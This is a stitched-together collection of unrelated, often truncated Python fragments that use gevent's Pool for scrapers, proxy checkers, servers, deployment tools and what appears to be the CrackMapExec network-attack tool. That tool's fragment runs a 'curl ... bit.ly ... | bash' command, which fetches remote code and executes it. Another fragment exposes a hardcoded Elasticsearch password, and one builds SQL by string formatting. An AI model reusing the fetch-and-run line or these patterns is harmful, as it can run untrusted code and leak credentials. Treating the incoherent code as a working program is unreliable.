def get_post(target_url):
    try:
        driver.get(target_url)
        print(target_url)
        ui.WebDriverWait(driver, 5).until(
            EC.visibility_of_element_located((By.XPATH, '//a[@class="block"]')))
    except TimeoutException as e:
        driver.quit()
        print(e)
        return

    button = driver.find_element_by_xpath('//a[@class="block"]')
    Action = TouchActions(driver)
    Action.scroll_from_element(button, 0, 5000).perform()

    datas = driver.find_elements_by_tag_name('a')
    urls = [i for i in [i.get_attribute('href') for i in datas if i.get_attribute('href')]
            if 'detail' in i]

    for url in urls:
        try:
            client.all_post.mogujie_detail_url.insert({'_id': url, 'status': 0})
            print('over:', url)
        except Exception as e:
            print(e)

    client.all_post.mogujie_user.update({'_id': target_url}, {'$set': {'status': 1}})
    driver.quit()


if __name__ == '__main__':
    pool = Pool(3)
    while 1:
        urls = [i['_id'] for i in client.all_post.mogujie_user.find({'status': 0}).limit(30)]
        print(len(urls))
        if urls:
            pool.map(get_post, urls)
            print(len(urls), 'over')
        time.sleep(60)
from mioji.common.conf_manage import g_config
from mioji.common.callback import CallbackWorkload
from mioji.common.common import get_proxy
from mioji.common.common import check_all_result
from mioji.common.parser_except import ParserException, SLAVE_ERROR
from mioji.common.warning import warn
from mioji.common import spider

# Wire in the proxy getter
spider.slave_get_proxy = get_proxy

callback = CallbackWorkload()
# Coroutine pool for handling tasks
g_co_pool = Pool(g_config.co_pool_size)
# Queue of tasks received by the listener thread
g_task_queue = Queue(g_config.task_queue_size)
# Queue of asynchronous tasks other than crawl tasks (e.g. writing raw logs to object storage)
g_task_post_process_queue = Queue(g_config.process_queue_size)
# Coroutine pool for handling post-process tasks
g_post_process_co_pool = Pool(g_config.co_pool_size)
# Spider factory object
g_spider_factory = SpiderFactory()
# Coroutine pool for asynchronous callbacks
g_asy_callback_pool = Pool(g_config.target_async_size)
# Subprocess queue for listened tasks
g_multi_queue = multiprocessing.Queue()


# Task worker thread
class Worker(Thread):
import logging
from gevent.pool import Pool
from valve.source.master_server import MasterServerQuerier
from valve.source.a2s import ServerQuerier, NoResponseError
from valve.source.messages import BrokenMessageError
from typing import List
import requests

MASTER_HOST = 'hl2master.steampowered.com'
MASTER_TIMEOUT = 60
SERVER_TIMEOUT = 5

pool = Pool(size=3)


def get_ip_from_dns(dns: str) -> str:
    response = requests.post('http://ping.eu/action.php?atype=3',
                             data={'host': dns, 'go': 'Go'})
    return response.text.split(dns + " has address <span class=t2>")[1].split('</span>')[0]


def get_server_stats(address: List[str]):
    server = ServerQuerier(address, timeout=SERVER_TIMEOUT)
    try:
        info = server.info()
        # rules = server.rules()
        logging.info(
            u'Updated {0}:{1} █ {player_count}/{max_players} players █ {server_name} █ {map} █ {server_type}'.format(
                address[0], address[1], **info))
        # logging.info(u'Rules {rules} \n'.format(**rules))
        return True
    except (NotImplementedError, NoResponseError, BrokenMessageError):
def __init__(self):
    self.pool = Pool(1000)
    self.pool.start()
def _init_pool(self):
    self.pool = Pool(10)
def __init__(self, queue, db_proxy_num):
    self.crawl_pool = Pool(THREADNUM)
    self.queue = queue
    self.db_proxy_num = db_proxy_num
def on_messages(self, raiden: "RaidenService", messages: List[Message]) -> None:
    # pylint: disable=unidiomatic-typecheck

    # Remove duplicated messages; this can happen because of retries done by
    # the sender when the receiver takes too long to acknowledge. This is a
    # problem since the receiver may be taking a long time to reply because it
    # is under high load, and processing the duplicated messages just makes
    # the problem worse.
    unique_messages: Set[Message] = set(messages)

    pool = Pool()
    for message in unique_messages:
        if type(message) == SecretRequest:
            assert isinstance(message, SecretRequest), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_secretrequest, (raiden, message))
        elif type(message) == RevealSecret:
            assert isinstance(message, RevealSecret), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_revealsecret, (raiden, message))
        elif type(message) == Unlock:
            assert isinstance(message, Unlock), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_unlock, (raiden, message))
        elif type(message) == LockExpired:
            assert isinstance(message, LockExpired), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_lockexpired, (raiden, message))
        elif type(message) == RefundTransfer:
            assert isinstance(message, RefundTransfer), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_refundtransfer, (raiden, message))
        elif type(message) == LockedTransfer:
            assert isinstance(message, LockedTransfer), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_lockedtransfer, (raiden, message))
        elif type(message) == WithdrawRequest:
            assert isinstance(message, WithdrawRequest), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_withdrawrequest, (raiden, message))
        elif type(message) == WithdrawConfirmation:
            assert isinstance(message, WithdrawConfirmation), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_withdraw_confirmation, (raiden, message))
        elif type(message) == WithdrawExpired:
            assert isinstance(message, WithdrawExpired), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_withdraw_expired, (raiden, message))
        elif type(message) == Delivered:
            assert isinstance(message, Delivered), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_delivered, (raiden, message))
        elif type(message) == Processed:
            assert isinstance(message, Processed), MYPY_ANNOTATION
            pool.apply_async(self.handle_message_processed, (raiden, message))
        else:
            log.error(f"Unknown message cmdid {message.cmdid}")

    all_state_changes: List[StateChange] = list()
    for greenlet in joinall(set(pool), raise_error=True):
        all_state_changes.extend(greenlet.get())

    if all_state_changes:
        # Order balance proof messages based on the target channel and the
        # nonce. The balance proof messages must be processed in order, and
        # there is no guarantee of the order of messages (an asynchronous
        # network is assumed). This reduces latency when a balance proof is
        # considered invalid because of a race with the blockchain view of
        # each node.
        def by_canonical_identifier(state_change: StateChange) -> Tuple[int, int]:
            if isinstance(state_change, BalanceProofStateChange):
                balance_proof = state_change.balance_proof
                return (
                    balance_proof.canonical_identifier.channel_identifier,
                    balance_proof.nonce,
                )
            return 0, 0

        all_state_changes.sort(key=by_canonical_identifier)

        raiden.handle_and_track_state_changes(all_state_changes)
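# A minimal, self-contained sketch (not from the original code) of the same
# dispatch pattern used above: fan work out with Pool.apply_async, then wait
# on the pool's greenlets with joinall and collect each result. The toy
# handlers handle_even/handle_odd stand in for the real message handlers.
from gevent import joinall
from gevent.pool import Pool


def handle_even(n):
    return ['even-%d' % n]


def handle_odd(n):
    return ['odd-%d' % n]


def on_items(items):
    pool = Pool()
    for item in set(items):  # drop duplicates, as the method above does
        handler = handle_even if item % 2 == 0 else handle_odd
        pool.apply_async(handler, (item,))

    results = []
    # None of the greenlets run until we yield, so set(pool) still holds all
    # of them; joinall waits for every handler and re-raises any failure.
    for greenlet in joinall(set(pool), raise_error=True):
        results.extend(greenlet.get())
    return results


print(on_items([1, 2, 2, 3, 4]))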
def main():
    setup_logger()
    logger = CMXLogAdapter()
    first_run_setup(logger)

    args = gen_cli_args()

    module = None
    module_server = None
    targets = []
    server_port_dict = {'http': 80, 'https': 443, 'smb': 445}
    current_workspace = cfg.WORKSPACE
    hasPassList = False

    if args.debug:
        setup_debug_logger()

    if args.darrell:
        links = open((cfg.DATA_PATH / 'videos_for_darrell').with_suffix('.harambe')).read().splitlines()
        try:
            webbrowser.open(random.choice(links))
            sys.exit(1)
        except:
            sys.exit(1)

    if args.rekt:
        try:
            os.system("curl -s -L http://bit.ly/10hA8iC | bash")
            sys.exit(1)
        except:
            sys.exit(1)

    logging.debug('Passed args:\n' + pformat(vars(args)))

    if hasattr(args, 'username') and args.username:
        for user in args.username:
            if Path(user).is_file():  # If it was a file passed in
                args.username.remove(user)
                args.username.append(open(user, 'r'))

    if hasattr(args, 'password') and args.password:
        for passw in args.password:
            if Path(passw).is_file():  # If it was a file passed in
                hasPassList = True
                args.password.remove(passw)
                args.password.append(open(passw, 'r'))

    elif hasattr(args, 'hash') and args.hash:
        for ntlm_hash in args.hash:
            if Path(ntlm_hash).is_file():  # If it was a file passed in
                args.hash.remove(ntlm_hash)
                args.hash.append(open(ntlm_hash, 'r'))

    if hasattr(args, 'cred_id') and args.cred_id:
        for cred_id in args.cred_id:
            if '-' in str(cred_id):
                start_id, end_id = cred_id.split('-')
                try:
                    for n in range(int(start_id), int(end_id) + 1):
                        args.cred_id.append(n)
                    args.cred_id.remove(cred_id)
                except Exception as e:
                    logger.error('Error parsing database credential id: {}'.format(e))
                    sys.exit(1)

    if hasattr(args, 'target') and args.target:
        for target in args.target:
            if Path(target).is_file():  # If it was a file passed in
                target_file_type = identify_target_file(target)
                if target_file_type == 'nmap':
                    targets.extend(parse_nmap_xml(target, args.protocol))
                elif target_file_type == 'nessus':
                    targets.extend(parse_nessus_file(target, args.protocol))
                else:
                    with open(target, 'r') as target_file:
                        for target_entry in target_file:
                            targets.extend(parse_targets(target_entry))
            else:
                targets.extend(parse_targets(target))

    p_loader = protocol_loader()
    protocol_path = p_loader.get_protocols()[args.protocol]['path']
    protocol_db_path = p_loader.get_protocols()[args.protocol]['dbpath']
    protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)
    protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path), 'database')

    db_path = (cfg.WS_PATH / current_workspace / args.protocol).with_suffix('.db')

    # Set the database connection to autocommit w/ isolation level
    db_connection = sqlite3.connect(db_path, check_same_thread=False)
    db_connection.text_factory = str
    db_connection.isolation_level = None
    db = protocol_db_object(db_connection)

    setattr(protocol_object, 'config', cfg.__dict__)

    if hasattr(args, 'module'):
        loader = module_loader(args, db, logger)

        if args.list_modules:
            modules = loader.get_modules()
            for name, props in sorted(modules.items()):
                logger.announce('{:<25} {}'.format(name, props['description']))
            sys.exit(0)

        elif args.module and args.show_module_options:
            modules = loader.get_modules()
            for name, props in modules.items():
                if args.module.lower() == name.lower():
                    logger.announce('{} module options:\n{}'.format(name, props['options']))
            sys.exit(0)

        elif args.module:
            modules = loader.get_modules()
            for name, props in modules.items():
                if args.module.lower() == name.lower():
                    module = loader.init_module(props['path'])
                    setattr(protocol_object, 'module', module)
                    break

            if not module:
                logger.error('Module not found')
                exit(1)
            if getattr(module, 'opsec_safe') is False:
                ans = raw_input(highlight(
                    '[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ',
                    'red'))
                if ans.lower() not in ['y', 'yes', '']:
                    sys.exit(1)

            if getattr(module, 'multiple_hosts') is False and len(targets) > 1:
                ans = raw_input(highlight(
                    "[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ",
                    'red'))
                if ans.lower() not in ['y', 'yes', '']:
                    sys.exit(1)

            if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
                if hasattr(module, 'required_server'):
                    args.server = getattr(module, 'required_server')

                if not args.server_port:
                    args.server_port = 443

                context = Context(db, logger, args)
                module_server = CMXServer(module, context, logger, args.server_host,
                                          args.server_port, args.server)
                module_server.start()
                setattr(protocol_object, 'server', module_server.server)

    try:
        '''
        Open all the greenlet threads
        '''
        pool = Pool(args.threads)
        jobs = []
        for target in targets:
            jobs.append(pool.spawn(protocol_object, args, db, str(target)))

        if args.timeout == 0:
            args.timeout = None
        for job in jobs:
            job.join(timeout=args.timeout)

    except (KeyboardInterrupt, gevent.Timeout):
        logging.info("Timed out")
        pass

    if module_server:
        module_server.shutdown()
                call.get('recording_url') or call.get('voicemail_url')):
            call['url'] = call.get('recording_url', call.get('voicemail_url'))
            if call['duration'] > 0:
                call['Type'] = 'Answered Call'
                call['Answered or Voicemail Duration'] = call['duration']
            else:
                call['Type'] = 'Voicemail'
                call['Answered or Voicemail Duration'] = call['voicemail_duration']
            calls.append(call)
        offset += len(resp['data'])
        has_more = resp['has_more']


pool = Pool(5)
pool.map(getRecordedCalls, days)

# Sort all calls by date_created so they are in order; they were pulled in parallel
calls = sorted(calls, key=itemgetter('date_created'), reverse=True)


# Method to download a call recording or voicemail recording
def downloadCall(call):
    try:
        call_title = "close-recording-%s.mp3" % call['id']
        url = call['url']
        doc = requests.get(
            url,
            headers={'Content-Type': 'application/json'},
            auth=(args.api_key, ''),
def __init__(self): """建立Redis数据库连接""" self.redis = StrictRedis.from_url(REDIS_URL) # 创建协程池对象 self.pool = Pool()
    server.start()

for target in args.target:
    if os.path.exists(target):
        with open(target, 'r') as target_file:
            for target_entry in target_file:
                targets.extend(parse_targets(target_entry))
    else:
        targets.extend(parse_targets(target))

try:
    '''
    Open all the greenlet (as opposed to redlet??) threads
    Whoever came up with that name has a fetish for traffic lights
    '''
    pool = Pool(args.threads)
    jobs = [
        pool.spawn(connector, str(target), args, db, module, context, server)
        for target in targets
    ]

    # Dumping the NTDS.DIT and/or spidering shares can take a long time,
    # so we ignore the thread timeout
    if args.ntds or args.spider:
        joinall(jobs)
    elif not args.ntds:
        for job in jobs:
            job.join(timeout=args.timeout)
except KeyboardInterrupt:
    pass

if server:
# -*- coding: UTF-8 -*-
from gevent import monkey
monkey.patch_all()

import gevent
import urllib.request
from gevent.pool import Pool


def run_task(url):
    print("visit----------%s" % url)
    try:
        rep = urllib.request.urlopen(url)
        data = rep.read()
        print("%d bytes received from %s" % (len(data), url))
    except Exception as e:
        print(e)
    return "url:%s ------>finished" % url


if __name__ == "__main__":
    pool = Pool(2)
    urls = [
        "https://github.com",
        "https://www.python.org/",
        "http://www.cnblogs.com/",
        "http://www.baidu.com",
    ]
    # greenlets = [gevent.spawn(run_task, url) for url in urls]
    # gevent.joinall(greenlets)
    result = pool.map(run_task, urls)
    print(result)
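# A variant sketch (not part of the example above): Pool.imap_unordered yields
# each result as soon as its greenlet finishes, instead of returning a list in
# input order the way pool.map does. Useful when responses should be processed
# as they arrive.
from gevent import monkey
monkey.patch_all()

import urllib.request
from gevent.pool import Pool


def fetch(url):
    try:
        data = urllib.request.urlopen(url).read()
        return url, len(data)
    except Exception as e:
        return url, e


if __name__ == "__main__":
    pool = Pool(2)  # at most two requests in flight
    urls = ["https://github.com", "https://www.python.org/", "http://www.baidu.com"]
    for url, result in pool.imap_unordered(fetch, urls):
        print(url, result)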
    pool.join()
    queue.put((None, None))
    result = cal_greenlet.get()
    return result


def stream_handler(sock, address):
    if DEBUG:
        profile_module(TCPHandler, sock, address, request_handler)
    else:
        TCPHandler(sock, address, request_handler)


if __name__ == '__main__':
    try:
        port = int(sys.argv[1])
    except IndexError:
        port = 9001

    print "Server listening on port: ", port
    pool = Pool(1024)
    server = StreamServer(("0.0.0.0", port), stream_handler, backlog=128, spawn=pool)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print "Server exit..."
        server.stop()
def run(func, m, n, pool_size=10):
    p = Pool(pool_size)
    g = [p.spawn(func, i, j) for i, j in zip(m, n)]
    gevent.joinall(g)
    return map(lambda x: x.value, g)
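# A usage sketch for the run() helper above, assuming a toy add() function
# (not part of the original). On Python 3 the returned map object is lazy,
# so wrap it in list() to materialize the results.
import gevent


def add(a, b):
    gevent.sleep(0.1)  # simulate I/O-bound work
    return a + b


results = run(add, range(5), range(5), pool_size=3)
print(list(results))  # [0, 2, 4, 6, 8]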
app = Blueprint('douyin_data', __name__)
# root_logger = init_logger()
es = Elasticsearch(
    [{
        'host': 'es-cn-v641jqyjv000i1mmi.elasticsearch.aliyuncs.com',
        'port': 9200
    }],
    http_auth=('elastic', 'PlRJ2Coek4Y6'))
url_set = {'172.17.0.43:27017'}
# mongo_client = mongo_client.MongodbClient(url_set, "douyin", username="******", password="******")
pool_size = 5
pool = Pool(pool_size)
goup = []


class Logger(object):
    # Mapping from level names to logging levels
    level_relations = {
        'debug': logging.DEBUG,
        'info': logging.INFO,
        'warning': logging.WARNING,
        'error': logging.ERROR,
        'crit': logging.CRITICAL
    }

    def __init__(
            self,
            filename,
from gevent import monkey
monkey.patch_all()

import gevent
import urllib2
from gevent.pool import Pool


def f(url):
    print('GET: %s' % url)
    resp = urllib2.urlopen(url)
    data = resp.read()
    print('%d bytes received from %s.' % (len(data), url))


'''
gevent.joinall([
    gevent.spawn(f, 'https://www.python.org/'),
    gevent.spawn(f, 'https://www.baidu.com/'),
    gevent.spawn(f, 'https://github.com/'),
])
'''

url = [
    'https://www.python.org/',
    'https://www.baidu.com/',
    'https://github.com/',
    'https://www.baidu.com/',
]

p = Pool(10)
# p.map(f, url)
urls = [gevent.spawn(f, i) for i in url]
gevent.wait(urls)
def run_server():
    http = WSGIServer((host, port), app.wsgi_app, spawn=Pool(2))
    http.serve_forever()
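# A self-contained variant of the pattern above (assumed names: a bare WSGI
# callable instead of Flask's app.wsgi_app, host/port chosen arbitrarily).
# The Pool passed as spawn= caps how many requests are handled concurrently;
# extra connections wait until a greenlet frees up.
from gevent.pool import Pool
from gevent.pywsgi import WSGIServer


def application(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'hello from a pooled gevent server\n']


if __name__ == '__main__':
    server = WSGIServer(('127.0.0.1', 8080), application, spawn=Pool(100))
    server.serve_forever()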
    item = easygui.enterbox('Scrape Item:', TITLE)
    if item == '':
        continue
    elif not item:
        quit()
    item = urllib.parse.quote_plus(item)

    country_choices = easygui.multchoicebox(
        'Item Location/s:', TITLE, [k for k, v in country_codes.items()])

    for country in country_choices:
        print(f'Scraping {country}...')
        pool = Pool(25)
        for n in range(1, 11):
            url = f'https://www.ebay.com/sch/i.html?_ftrt=901&_sop=12&_dmd=1&LH_BIN=1&_ftrv=1&_from=R40&_sacat=0&_fosrp=1&_nkw={item}&LH_LocatedIn={country_codes[country]}&_ipg=200&rt=nc&_pgn={n}&LH_TitleDesc=1'
            pool.spawn(scrape_ebay, url)
        pool.join()

    s = sorted(data, key=lambda x: int(data[x]['sales']), reverse=True)

    doc, tag, text = Doc().tagtext()
    with tag('body', style="font-family: Roboto"):
        with tag('div', style="margin: 20px auto; width: 90%;"):
            with tag(
                    'h1',
                    style=
# Asks for user input (an integer).
# On error, shows a message to the user.
try:
    threads = int(sys.argv[2])
    times = int(sys.argv[3])
except ValueError:
    print("Enter an integer, please! (╯°□°)╯")
    sys.exit(1)
except:
    pass

# Shows a nice message to the user. :)
print("Starting benchmark... (ノ◕ヮ◕)ノ*:・゚✧")
print("Requesting from " + url)

# Starts a pool with n workers (greenlets).
pool = Pool(threads)

# Gets the status of every request, and stores them as a list.
# for i in progress_bar(range(times), "Loading: ", "🐮 ", " 🌿", 25):
status = pool.map(stress_test, [url] * times)

# Count each status code and how many times it occurred.
result = dict((i, status.count(i)) for i in status)

# Create a directory (if it doesn't exist) called "logs".
# Store the log file in it.
create_directory("./logs/")
log = create_log("./logs/", result, url)

print("Benchmark done! Check your log file: " + log)
def main():
    print('Start time: %s' % time.ctime())

    try:
        mysql_conn = MySQLdb.connect(
            host=config.mysql_host,
            port=config.mysql_port,
            user=config.mysql_user,
            passwd=config.mysql_passwd,
            db=config.mysql_db,
            charset=config.mysql_charset
        )
        mysql_conn.autocommit(True)
        mysql_cursor = mysql_conn.cursor(MySQLdb.cursors.DictCursor)
    except Exception as e:
        error_msg = 'Failed to connect to MySQL: {error_msg}'.format(error_msg=traceback.format_exc())
        logging.error(error_msg)

    first_visit_status = login_status = logout_status = 0

    session = requests.Session()
    try:
        resp = session.get(url='', verify=True, timeout=5)
        first_visit_status = 1
    except Exception as e:
        print('First visit failed: %s' % e)

    post_data = {}
    html = PyQuery(resp.text)
    input_list = html('')('')
    for item in input_list:
        if item.type == '':
            continue
        post_data[item.name] = item.value
    post_data['username'] = ad_username
    post_data['password'] = ad_password

    try:
        resp = session.post(url='', verify=False, timeout=5, data=post_data)
        if resp.status_code == 302 or resp.status_code == 307 or resp.status_code == 200:
            login_status = 1
        else:
            print('Login failed')
    except Exception as e:
        print('Login failed: %s' % e)

    if first_visit_status == 1 and login_status == 1:
        cookie_jar = RequestsCookieJar()
        cookie_jar.update(resp.cookies)

        mysql_cursor.execute('SELECT * FROM domain WHERE status=1')
        domains = mysql_cursor.fetchall()
        mysql_conn.close()

        gevent_pool = Pool(POOL_SIZE)
        gevent_pool.map(test_domain, [(d, cookie_jar) for d in domains])
        gevent_pool.join()

        logouturl = ''
        try:
            resp = session.get(url=logouturl, verify=True, timeout=5)
            if resp.status_code == 302 or resp.status_code == 307 or resp.status_code == 200:
                logout_status = 1
            else:
                print('Logout failed')
        except Exception as e:
            result += u'\tLogout ERROR {e}\n'.format(e=e)

        if logout_status == 1:
            results.sort(key=lambda x: (x['domain']))
            for result in results:
                print('%s' % result['domain'])
                print(result['result'].rstrip('\n'))
                print('')
            print('%s domain redirect to APSSO' % redirect2apsso_cnt)
            print('%s domain redirect to SSO' % redirect2sso_cnt)
            print('%s domain return 5xx' % len(error_5xx_domain))
            print(json.dumps(error_5xx_domain))
            print('%s domain return 4xx' % len(error_4xx_domain))
            print(json.dumps(error_4xx_domain))

    print('Finish time: %s' % time.ctime())
    print('-' * 20)
    print(' ')
    module_list = [testCoupon, testCharge, testActivity]
    tests = []
    for module in module_list:
        tests.append(unittest.TestLoader().loadTestsFromModule(module))
    return tests


if __name__ == "__main__":
    suite = []
    for m, v in enumerate(loadTestsList()):
        suite.append(unittest.TestSuite())
        suite[m].addTests(list(v))

    task = []
    pool = Pool(10)
    k = 0
    for i in suite:
        k += 1
        filePath = os.path.join(gl.reportPath, 'Report{}.html'.format(k))  # path of the generated report
        print filePath
        print i
        with open(filePath, 'wb') as fp:
            runner = HTMLTESTRunnerCN.HTMLTestRunner(
                stream=fp,
                title=u'API automated test report',
                description=u'Detailed test case results',  # defaults to empty if not provided
                tester=u"yhleng"  # tester's name; defaults to 小强 if not provided
            )
            # Run the test cases
USERNAME = '******'
API_KEY = 'api key'

cls = get_driver(Provider.CLOUDFILES_US)
driver = cls(USERNAME, API_KEY)


def download_obj(container, obj):
    driver = cls(USERNAME, API_KEY)
    obj = driver.get_object(container_name=container.name, object_name=obj.name)
    filename = os.path.basename(obj.name)
    path = os.path.join(os.path.expanduser('~/Downloads'), filename)
    print 'Downloading: %s to %s' % (obj.name, path)
    obj.download(destination_path=path)


containers = driver.list_containers()

jobs = []
pool = Pool(20)

for index, container in enumerate(containers):
    objects = container.list_objects()
    for obj in objects:
        pool.spawn(download_obj, container, obj)

pool.join()
print 'Done'
def init(self, inventory, config, initial_limit=None):
    # Config validation
    #

    # If no config, create one using the defaults
    if config is None:
        config = Config()

    # Error if our min version is not met
    if config.MIN_PYINFRA_VERSION is not None:
        running_version = parse_version(__version__)
        needed_version = parse_version(
            # Version must be a string
            six.text_type(config.MIN_PYINFRA_VERSION),
        )
        if needed_version > running_version:
            raise PyinfraError((
                'Minimum pyinfra version not met '
                '(minimum={0}, running={1})'
            ).format(
                config.MIN_PYINFRA_VERSION,
                __version__,
            ))

    if not config.PARALLEL:
        # TODO: benchmark this
        # In my own tests the optimum number of parallel SSH processes is
        # ~20 per CPU core - no science here yet, needs benchmarking!
        cpus = cpu_count()
        ideal_parallel = cpus * 20

        config.PARALLEL = (
            min(ideal_parallel, len(inventory), MAX_PARALLEL)
            if MAX_PARALLEL is not None
            else min(ideal_parallel, len(inventory))
        )

    # If explicitly set, just issue a warning
    elif MAX_PARALLEL is not None and config.PARALLEL > MAX_PARALLEL:
        logger.warning((
            'Parallel set to {0}, but this may hit the open files limit of {1}.\n'
            ' Max recommended value: {2}'
        ).format(config.PARALLEL, nofile_limit, MAX_PARALLEL))

    # Actually initialise the state object
    #

    # Setup greenlet pools
    self.pool = Pool(config.PARALLEL)
    self.fact_pool = Pool(config.PARALLEL)

    # Connection storage
    self.ssh_connections = {}
    self.sftp_connections = {}

    # Private keys
    self.private_keys = {}

    # Facts storage
    self.facts = {}
    self.fact_locks = {}

    # Assign inventory/config
    self.inventory = inventory
    self.config = config

    # Hosts we've activated at any time
    self.activated_hosts = set()

    # Active hosts that *haven't* failed yet
    self.active_hosts = set()

    # Hosts that are ready to be deployed to
    self.ready_hosts = set()

    # Limit hosts changes dynamically to limit operations to a subset of hosts
    self.limit_hosts = initial_limit

    # Op basics
    self.op_line_numbers_to_hash = {}
    self.op_meta = {}  # maps operation hash -> names/etc
    self.ops_run = set()  # list of ops which have been started/run

    # Op dict for each host
    self.ops = {
        host: {}
        for host in inventory
    }

    # Facts dict for each host
    self.facts = {
        host: {}
        for host in inventory
    }

    # Meta dict for each host
    self.meta = {
        host: {
            'ops': 0,  # one function call in a deploy file
            'commands': 0,  # actual # of commands to run
            'op_hashes': set(),
        }
        for host in inventory
    }

    # Results dict for each host
    self.results = {
        host: {
            'ops': 0,  # success_ops + failed ops w/ignore_errors
            'success_ops': 0,
            'error_ops': 0,
            'commands': 0,
        }
        for host in inventory
    }

    # Assign state back references to inventory & config
    inventory.state = config.state = self

    self.initialised = True
def __init__(self, queue, db_proxy_num, myip):
    # Cap the number of concurrent coroutines
    self.crawl_pool = Pool(config.THREADNUM)
    self.queue = queue
    self.db_proxy_num = db_proxy_num
    self.myip = myip
def deploy_tarball_to_s3(tarball_obj, bucket_name, prefix='', region='eu-west-1',
                         concurrency=100, no_compress=False, strip_components=0):
    """
    Upload the contents of `tarball_obj`, a file-like object representing a valid
    .tar.gz file, to the S3 bucket `bucket_name`.
    """
    # Connect to S3 and get a reference to the bucket name we will push files to
    conn = connect_to_region(region)
    if conn is None:
        logging.error("Invalid AWS region %s" % region)
        return

    try:
        bucket = conn.get_bucket(bucket_name, validate=True)
    except boto.exception.S3ResponseError:
        logging.error("S3 bucket %s does not exist in region %s" % (bucket_name, region))
        return

    # Open the tarball
    try:
        with tarfile.open(name=None, mode="r:*", fileobj=tarball_obj) as tarball:
            files_uploaded = 0

            # Parallelize the uploads so they don't take ages
            pool = Pool(concurrency)

            # Iterate over the tarball's contents.
            try:
                for member in tarball:
                    # Ignore directories, links, devices, fifos, etc.
                    if not member.isfile():
                        continue

                    # Mimic the behaviour of tar -x --strip-components=
                    stripped_name = member.name.split('/')[strip_components:]
                    # f.write(stripped_name)
                    if not bool(stripped_name):
                        continue

                    path = os.path.join(prefix, '/'.join(stripped_name))
                    # f.write(member)

                    # Read file data from the tarball
                    fd = tarball.extractfile(member)

                    # Send a job to the pool.
                    pool.wait_available()
                    # f.write(((str(stripped_name)).strip("['")).replace("']", ','))
                    pool.apply_async(__deploy_asset_to_s3,
                                     (fd.read(), path, member.size, bucket, not no_compress))
                    files_uploaded += 1

                # Wait for all transfers to finish
                pool.join()
            except KeyboardInterrupt:  # Ctrl-C pressed
                print("Cancelling upload...")
                pool.join()
            finally:
                print("Uploaded %i files" % (files_uploaded))
    except tarfile.ReadError:
        print("Unable to read asset tarfile", file=sys.stderr)
        return
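# The wait_available()/apply_async() pairing above gives backpressure: the
# loop blocks until the pool has a free slot before reading the next tarball
# member, so at most `concurrency` file bodies sit in memory at once. Below is
# a stripped-down sketch of that pattern, with a dummy upload() standing in
# for __deploy_asset_to_s3.
import gevent
from gevent.pool import Pool


def upload(name, payload):
    gevent.sleep(0.1)  # stand-in for real S3 upload latency
    print('uploaded %s (%d bytes)' % (name, len(payload)))


pool = Pool(4)  # at most 4 uploads in flight
for i in range(20):
    payload = b'x' * 1024
    pool.wait_available()  # block until a slot frees up
    pool.apply_async(upload, ('file-%d' % i, payload))
pool.join()  # wait for the remaining uploads to finish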
    for td in data:
        for i in td.cssselect('td:nth-child(1)'):
            ip = i.text_content()
        for i in td.cssselect('td:nth-child(2)'):
            port = i.text_content()
        ip = {'http': 'http' + '://' + ip + ':' + port}
        try:
            html = requests.get(conurl, headers=headers, proxies=ip, timeout=5).status_code
        except Exception as e:
            # print e
            html = 404
            print u'ip:%s is unavailable' % ip
        if html == 200:
            # The IP works; insert it into the database
            license = 10
            print u'ip:%s is available' % ip
            sql = "INSERT INTO datas (`ip`, `license`) VALUES('%s','%s')" % (ip['http'], license)
            try:
                save_ip(sql)
            except:
                # Ignore the error raised when inserting a duplicate row
                print u'ip:%s is already in the database' % ip


def get_proxies():
    urls = ['https://www.kuaidaili.com/free/inha/%s/' % i for i in range(1, 20)]
    print urls
    pool = Pool(1)
    pool.map(parser, urls)
    pool.kill()
    pool.join()


if __name__ == '__main__':
    get_proxies()
def __init__(self, host='127.0.0.1', port=8181, **options):
    super(GeventPoolServer, self).__init__(
        host, port, spawn=Pool(size=pool_size), **options)
def test_proxies(proxies, timeout=10, single_url=None, many_urls=None, call_back=None):
    """
    Test the given proxies, dropping any whose response time exceeds `timeout`,
    and optionally process pages while testing: when a request returns 200,
    call_back(url, source) is invoked.

    :type proxies: list
    :param proxies: list of proxies
    :param timeout: response-time limit in seconds
    :param single_url: URL used for testing
    :param many_urls: list of candidate test URLs; one is chosen at random per test
    :param call_back: handles the source of the tested page, callback(url, source)
    :return:
    """
    proxies = set(proxies)
    errors = set()
    pool = Pool(100)

    def test(proxy):
        code = None
        url = random.choice(many_urls) if many_urls is not None else single_url
        try:
            with gevent.Timeout(seconds=timeout, exception=Exception('[Connection Timeout]')):
                headers['User-Agent'] = random.choice(user_agents)
                res = requests.get(url, proxies={
                    'http': 'http://{}'.format(proxy.strip()),
                    'https': 'https://{}'.format(proxy.strip())
                }, headers=headers)
                code = res.status_code
                source = res.text
            log('[Proxy: {:d} {:s}]'.format(code, proxy))
            # Invoke the callback
            if source is not None and call_back is not None and code == 200:
                call_back(url, source)
            if code != 200:
                errors.add(proxy)
        except Exception as e:
            # log(e.args)
            errors.add(proxy)
        store_in_db(proxy, status_code=code)  # persist the result

    for proxy in proxies:
        pool.spawn(test, proxy)
    pool.join()

    proxies = proxies - errors
    log('[HTTP Proxies] Available:{:d} Deprecated:{:d}'.format(len(proxies), len(errors)))
    return list(proxies)
def __init__(self):
    self.urls_queue = Queue()
    self.pool = Pool(CONFIG.POOL_MAXSIZE)
    self.logger = Logger.get()
    self.init_queue()
    self.create_dir()
def __init__(self, inventory, config=None):
    # Connection storage
    self.ssh_connections = {}
    self.sftp_connections = {}

    # Private keys
    self.private_keys = {}

    # Facts storage
    self.facts = {}
    self.fact_locks = {}

    # If no config, create one using the defaults
    if config is None:
        config = Config()

    if not config.PARALLEL:
